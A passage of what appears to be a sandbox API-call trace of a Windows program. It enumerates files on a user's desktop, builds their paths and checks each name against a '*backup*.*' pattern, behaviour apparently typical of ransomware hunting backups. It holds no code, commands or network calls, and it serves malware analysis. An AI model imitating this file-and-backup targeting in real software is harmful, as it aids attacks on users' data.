ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.904] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.904] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.904] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.904] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.904] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.904] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.904] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.904] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a29c0 [0110.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x29a29c0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", lpUsedDefaultChar=0x0) returned 59 [0110.904] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.904] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.904] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.904] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ca0 [0110.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970ca0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.904] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.904] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.904] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*backup*.*") returned 0 [0110.904] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.904] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.904] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.904] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.904] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.904] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.904] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.905] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.905] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2df8 [0110.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x29a2df8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", lpUsedDefaultChar=0x0) returned 61 [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970dc0 [0110.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970dc0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.905] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*backup*.*") returned 0 [0110.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.905] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.905] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.905] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.905] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.905] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.905] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.905] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="\\p B1LdDcHaeS\\E144W5Mz.swf") returned="\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2e40 [0110.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x29a2e40, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", lpUsedDefaultChar=0x0) returned 57 [0110.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b28 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.906] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*backup*.*") returned 0 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.906] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.906] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.906] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.906] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.906] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.906] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.906] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x39700d0 [0110.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x39700d0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", lpUsedDefaultChar=0x0) returned 65 [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eafd0 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.906] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ca0 [0110.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970ca0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.906] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.907] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*backup*.*") returned 0 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eafd0 | out: hHeap=0x29a0000) returned 1 [0110.907] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.907] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.907] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.907] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.907] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.907] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.907] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2a50 [0110.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x29a2a50, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", lpUsedDefaultChar=0x0) returned 62 [0110.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ce0 [0110.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970ce0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ce0 | out: hHeap=0x29a0000) returned 1 [0110.907] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*backup*.*") returned 0 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.907] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.907] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.908] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.908] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.908] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.908] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.908] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2d68 [0110.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x29a2d68, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", lpUsedDefaultChar=0x0) returned 59 [0110.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.908] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.908] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970b60 [0110.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970b60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.908] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.908] 